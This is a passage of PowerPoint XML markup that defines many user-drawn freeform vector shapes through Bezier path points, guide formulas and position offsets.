                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="56"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="41"/>
                      <a:pt x="71" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100"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301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="789"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 2"/>
                  <a:gd name="T8" fmla="*/ 2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cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2"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Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="789"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 2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2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="2"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Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="1468"/>
                <a:ext cx="82"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Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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307"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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309"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="1468"/>
                <a:ext cx="83"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311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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313"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="147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Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 241"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="27"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="104"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="1473"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112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Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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317"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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319"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="1468"/>
                <a:ext cx="82"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321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31"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325"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155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2" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>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Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="1473"/>
                <a:ext cx="78"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6 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17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Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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333"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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7" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27"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5"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Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="1460"/>
                <a:ext cx="218"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60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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 187 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160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9 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 45 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 49 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59 h 209"/>
                  <a:gd name="T98" fmla="*/ 86 w 179"/>
                  <a:gd name="T99" fmla="*/ 68 h 209"/>
                  <a:gd name="T100" fmla="*/ 71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6"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="209"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
